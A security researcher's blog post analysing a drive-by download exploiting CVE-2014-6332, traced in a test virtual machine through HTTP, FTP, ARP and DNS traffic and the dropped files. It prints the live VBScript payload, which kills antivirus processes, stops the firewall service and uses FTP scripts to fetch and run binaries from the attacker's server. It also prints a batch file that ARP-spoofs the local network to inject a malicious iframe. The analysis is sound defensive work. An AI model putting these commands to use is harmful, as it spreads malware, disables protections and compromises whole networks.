James Espinosa

A drive-by download that exploits CVE-2014-6332

James Espinosa -

First, Happy Thanksgiving to anyone that celebrates this holiday. In reality, I hope that we're all thankful every day. Yes, I know- I'm working on a blog post on turkey day. It's alright because I already helped cook a few items for the dinner table later this evening, and I have some free time, so why not?

I'll keep this one short. If you follow Microsoft Patch Tuesday's like I do, then you probably know that Microsoft provided a patch for Microsoft Security Bulletin MS14-064, which was rated as critical. You can learn more about it here.

The bulletin was assigned the following two CVE numbers:

  • Microsoft Windows OLE Automation Array Remote Code Execution Vulnerability (CVE-2014-6332)
  • Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-6352)

In this post, I want to talk about CVE-2014-6332, which has been observed in drive-by download attempts and exploit kits. For this particular post, I'm going to give an overview of a malicious site that I encountered serving this exploit. If you want to get an understanding of how this vulnerability can be exploited, take a look at the Metasploit module.

I'm going to provide some details, such as IP addresses, URLs, etc. Don't go clicking on these if you don't know what you're doing. These are publicly known, so I'm not worried about sharing them. Here we go.

All of the fun started after one of my virtual machines running a copy of Microsoft Windows XP Professional SP3 arrived at the following malicious URL serving this exploit:

  • hxxp://104.152.215.90/1.html

Here's an example of the full HTTP GET request:

GET /1.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)
Host: 104.152.215.90
Connection: Keep-Alive

Next, as expected, we're served the exploit that will trigger the vulnerability on my virtual machine:

HTTP/1.1 200 OK
Content-Length: 6347
Content-Type: text/html
Last-Modified: Sun, 23 Nov 2014 15:55:08 GMT
Accept-Ranges: bytes
ETag: "d8d71adb357d01:333"
Server: Microsoft-IIS/6.0
Date: Wed, 26 Nov 2014 00:19:01 GMT

Note, I'm not going to post the entire response here. Here are the more interesting portions of the payload:

<SCRIPT LANGUAGE="VBScript">
function runmumaa() 
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c net user admin /del",0
shell.run "cmd.exe /q /c sc stop sharedaccess",0
shell.run "cmd.exe /q /c md C:\RECYCLER",0
shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp1.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0
shell.run "cmd.exe /q /c del  C:\docume~1\alluse~1\............\....\....\360.exe",0
shell.run "cmd.exe /q /c del  C:\docume~1\alluse~1\............\....\....\361.exe",0
shell.run "cmd.exe /q /c del  C:\RECYCLER\360.exe",0
shell.run "cmd.exe /q /c del  C:\RECYCLER\361.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0
shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\............\....\....\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\............\....\....\arp2.exe&start C:\RECYCLER\fa2.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\ftp.dw&echo do1>>C:\RECYCLER\ftp.dw&echo 123456>>C:\RECYCLER\ftp.dw&echo bin >>C:\RECYCLER\ftp.dw&echo get arp2.exe C:\RECYCLER\arp22.exe>>C:\RECYCLER\ftp.dw&echo get fa2.exe C:\RECYCLER\faa.exe>>C:\RECYCLER\ftp.dw&echo bye >>C:\RECYCLER\ftp.dw&ping 127.0.0.1 -n 80&FtP -s:C:\RECYCLER\ftp.dw&del C:\RECYCLER\ftp.dw /q&copy C:\RECYCLER\faa.exe C:\docume~1\alluse~1\............\....\....\faa.exe&copy C:\RECYCLER\arp22.exe C:\docume~1\alluse~1\............\....\....\arp22.exe&start C:\RECYCLER\faa.exe&C:\RECYCLER\arp22.exe&del C:\RECYCLER\fp.exe",0
end function
</script>

At a quick glance, you can see something nasty is going on here. There are references to files in the RECYCLER folder, which we'll dig through shortly.

Next, I noticed interesting FTP traffic in Wireshark. The FTP server's address is actually listed in the VBScript above, which is the following:

  • 104.152.215.90

Next, the juicy details about the FTP session:

220 Serv-U FTP Server v6.0 for WinSock ready...
USER do1
331 User name okay, need password.
PASS 123456
230 User logged in, proceed.
TYPE I
200 Type set to I.
PORT 192,168,130,135,4,52
200 PORT Command successful.
RETR arp2.exe
150 Opening BINARY mode data connection for arp2.exe (412693 Bytes).
226 Transfer complete.
PORT 192,168,130,135,4,53
200 PORT Command successful.
RETR fa2.exe
150 Opening BINARY mode data connection for fa2.exe (200704 Bytes).
226 Transfer complete.
QUIT
221 Goodbye!

We can clearly see that additional binaries were downloaded from the FTP server. I uploaded the samples to VirusTotal, here are the reports:

Those two are clearly malicious. From the filename alone, arp2 seems like it will do something with the Address Resolution Protocol (ARP). Initially, I suspected ARP poisoning.

Interestingly, the following suspicious ARP traffic was observed as soon as the FTP connection was terminated:

Note, you will have to right-click and Open the Image in a New Tab to view the screenshot in greater detail.

Essentially, you can see ARP requests for the following IP addresses:

  • 192.168.130.1
  • 192.168.130.3
  • 192.168.130.4
  • 192.168.130.5
  • 192.168.130.X

Where the last octet is a host in the range of 1-255. Following the ARP requests comes a flood of ARP replies. The interesting thing is that these replies are Gratuitous ARP messages for 192.168.130.2, which is the IP address of the network's gateway. As an example:

Gratuitous ARP for 192.168.130.2 (Reply)
192.168.130.2 is at 00:0c:29:b3:ee:72

The MAC address that we see above is for the infected machine. So in plain English, our infected system is forcing other machines on the network to update the gateway's address in their ARP table, which now points to our infected system. In other words, this is an example of ARP spoofing. Essentially, this will cause network traffic to be forwarded through our infected machine and act like a proxy.

I continued to scroll down through the network traffic in Wireshark and started to observe DNS requests to suspicious domains:

  • bing200b.meibu.net
  • conf.f.360.cn
  • qup.f.360.cn
  • u.qurl.f.360.cn
  • qurl.qh-lb.com
  • sdup.360.cn
  • sdup.qh-lb.com
  • sdupm.360.cn
  • qd.code.qihoo.com
  • stat.360safe.com
  • stat-s.360safe.com
  • update.360safe.com
  • tr.p.360.cn
  • updateh.360safe.com
  • w.360.cn
  • stat.sd.360.cn
  • sdl.360safe.com
  • 360.cn
  • softm.update.360safe.com
  • antispy.db.kingsoft.com
  • bo.duba.net
  • f-sq.beike.cn
  • vc01.beike.cn

The list continued for many more domains with similar variations. A number of these domains also included what appeared to be domains for major anti-virus companies, like Kaspersky, AVG, ESET, etc. However, I did not verify if they were or not.

Meanwhile, back on the file system level I explored the contents of the RECYCLER folder on the root of the C drive. First, I enabled hidden files and folders on Windows, then I found the following items relaxing in there like it was a hot day at the beach.

Again, please right-click and Open the Image in a New Tab. At a quick glance, you can see some of the files that we mentioned earlier from the FTP session. Lets take a look inside some of these text-based files.

Inside of ip.txt is the infected machine's IP address. Inside of the install.bat file is the following:

copy npf.sys %systemroot%\system32\drivers
copy wpcap.dll %systemroot%\system32\
copy Packet.dll %systemroot%\system32\
@echo off
if exist ipconfig.txt del ipconfig.txt
ipconfig /all >ipconfig.txt
if exist IPAddr.txt del IPaddr.txt
find "IP Address" ipconfig.txt >IPAddr.txt
for /f "skip=2 tokens=15" %%K in (IPAddr.txt) do set IP=%%K
del IPAddr.txt
del ipconfig.txt
echo %ip%>ip.txt
del arp1.exe
del install.vbs
for /f "tokens=1-4 delims=." %%i in (ip.txt) do thatboy.exe -idx 0 -ip %%i.%%j.%%k.1-%%i.%%j.%%k.255 -port 80 -insert "<iframe src= http://104.152.215.90/1.html width=0 height=0></iframe>" -Interval 400 -spoofmode 2cls

That definitely looks juicy, huh? I'm not sure what your initial thoughts are, but my gut feeling tells me that this malware poisons the ARP cache to trick other systems on the network to forward their traffic through the infected machine.

The infected machine then runs the thatboy.exe binary and attempts to inject the malicious IFRAME to network traffic on port 80. What does this achieve? Basically, other machines on the network will also be infected with the same piece of malware, since they would also be exposed to the same exploit landing page. Lets take a closer look at the individual files.

The first file we'll explore is arp2.exe. Based on the icon of this file, it looks like it was probably created using WinRAR. I tried to extract the contents using 7-Zip, and sure enough, it dumped a folder with the following files in it:

  • install.bat
  • install.vbs
  • npf.sys
  • Packet.dll
  • wpcap.dll

So it looks like those files came from the file that was downloaded from the FTP server. I cracked the install.vbs file open, and here's what was inside:

Set lsxq=createobject("wscript.shell")
lsxq.run "install.bat",0
wscript.sleep(1000)

Honestly, this seems silly. I'm not really sure why this approach was taken, but whatever. Anyway, I also cracked open the install.bat file, but the contents were the same as those we already looked at above. Next, lets take a quick look at the executable, DLLs, and driver file.

The first binary is a file named thatboy.exe. I decided to dump this little guy into IDA Pro and take a look inside. I usually like to look through the strings first to see if there's anything I can use in there to zero in on. Thankfully, there were a lot of interesting strings in there, which ultimately lead me to the source code of the tool that was being used.

Here's a screenshot of some of the interesting strings I found:

From the strings in this binary, the following are pretty interesting:

Restoring the ARPTable...
Killing the SpoofThread...
zxarps Build 01/17/2007 by LZX.
Sniffing...
Scanning Alive Host...
Found Alive Host...
HTTP/1.1 302 Object Moved
Location: %s%s
Server: Microsoft-IIS/5.1
Content-Type: text/html
Content-Length: 0
Connection: close

Naturally, it made sense for me to Google for zxarps by LZX to see what would come up. A lot of the listings were in Chinese, but I did find two awesome sources that describe this tool in much greater detail.

As I suspected, thatboy.exe is actually a tool called zxarps, which uses WinPCAP to "sniff network data, poison ARP caches and modify webpages on the fly." Visit the following blog post for more information on this tool.

Additional Google magic also lead me to the source code of this tool. You can check out the source code on GitHub to learn more about the tool if you're curious.

The next executable that I took a quick look at was faa.exe. For reference, I uploaded the file to VirusTotal. Looking at the behavioral information tab, you can see all of the DNS requests that it attempted to do. Remember that we saw this in Wireshark earlier? This file looks like it could be a backdoor into the infected system.

Next, lets take a quick look at npf.sys. After some quick research online, this file turns out to be legitimate and is supposed to be part of WinPCAP. So to wrap up the arp2.exe file that we extracted all of these files from, here's what I believe happens in order:

  1. install.vbs executes install.bat
  2. install.bat copies the npf.sys file to \system32\drivers
  3. install.bat copies the wpcap.dll file to \system32
  4. install.bat copies the Packet.dll file to \system32
  5. install.bat creates ip.txt with the machines IP address
  6. install.bat executes the thatboy.exe binary

So I was right. This malware performs ARP spoofing on the network to cause other systems to route their traffic through the infected system, and inject a malicious IFRAME into webpages.

Essentially, a user lands on the server that is serving up the malicious CVE-2014-6332 exploit. If the system is vulnerable, the VBScript is executed. This script uses the FTP utility on the machine to connect to a remote FTP server and download additional binaries, which includes what appears to be a backdoor and appropriate libraries for WinPCAP to work properly with thatboy.exe, a tool that can ARP spoof the network and inject a malicious IFRAME to systems browsing the web.

So that about wraps up this post. It is a bit longer than I wanted it to be, but I thought it was fun to put the pieces together on this one. Oh, and I also had a great Thanksgiving dinner with my family earlier this evening. I hope you did also!